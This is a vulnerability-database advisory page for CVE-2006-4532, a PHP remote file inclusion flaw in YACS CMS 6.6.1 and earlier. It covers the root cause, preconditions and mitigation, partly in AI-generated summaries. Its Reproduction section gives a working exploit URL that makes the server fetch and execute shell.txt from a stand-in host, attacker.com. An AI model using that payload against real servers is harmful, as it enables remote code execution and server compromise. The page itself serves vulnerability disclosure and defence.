CVE-2006-4532
Description
YACS CMS 6.6.1 and earlier allows remote file inclusion via context[path_to_root] parameter in articles/article.php, enabling arbitrary code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
YACS CMS 6.6.1 and earlier allows remote file inclusion via context[path_to_root] parameter in articles/article.php, enabling arbitrary code execution.
Vulnerability
PHP remote file inclusion vulnerability exists in articles/article.php of YACS CMS version 6.6.1 and earlier. The script includes a file based on the user-supplied context[path_to_root] parameter without proper sanitization, allowing inclusion of remote files [1].
Exploitation
An attacker can exploit this by sending a crafted HTTP request to the vulnerable script with context[path_to_root] set to a URL hosting malicious PHP code, as demonstrated in public exploits [2]. No authentication or special network position is required beyond network access to the target.
Impact
Successful exploitation allows arbitrary PHP code execution with the privileges of the web server, potentially leading to full system compromise, including data theft, defacement, or further attacks.
Mitigation
No official patch has been released; the software may be end-of-life. Users should immediately remove or disable the vulnerable script, or implement strict input validation. The vulnerability is publicly known and listed in the Exploit Database [2].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- cpe:2.3:a:bernard_pacques:yet_another_community_system_cms:6.6.1:*:*:*:*:*:*:*
- Range: <=6.6.1
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"PHP remote file inclusion vulnerability due to unsanitized user input passed to a PHP include/require statement."
Attack vector
An attacker sends an HTTP GET request to articles/article.php with the context[path_to_root] parameter set to a URL pointing to an attacker-controlled remote server hosting malicious PHP code [ref_id=1]. The vulnerable script passes this user-supplied value directly into a PHP include/require construct, causing the server to fetch and execute the remote PHP code. No authentication or special privileges are required; the attack is performed over HTTP and the payload is simply a URL string.
Affected code
The vulnerable file is articles/article.php in YACS CMS 6.6.1 and earlier [ref_id=1]. The specific vulnerable code path is the inclusion of a file whose path is derived from the context[path_to_root] HTTP parameter without sanitization.
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] does not provide remediation code. The vendor would need to validate that the context[path_to_root] parameter contains only a local, expected path rather than an arbitrary URL, typically by whitelisting allowed paths or disabling remote file inclusion via php.ini configuration (allow_url_include = Off).
Preconditions
- networkAttacker must be able to send HTTP requests to the target server.
- inputThe target server must have PHP's allow_url_include or allow_url_fopen enabled (or the attacker must host a file reachable via a local path).
Reproduction
Send a request to the target server: http://[target]/[path]/yacs/articles/article.php?context[path_to_root]=http://attacker.com/shell.txt? [ref_id=1]. The trailing question mark prevents the appended code from interfering. The remote file will be included and executed by the PHP interpreter.
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- www.yetanothercommunitysystem.com/yacs/articles/view.php/1664nvdPatchURL Repurposed
- secunia.com/advisories/21680nvdExploitPatchVendor Advisory
- securitytracker.com/idnvdExploitPatch
- www.vupen.com/english/advisories/2006/3425nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/28682nvd
- www.exploit-db.com/exploits/2282nvd
News mentions
0No linked articles in our index yet.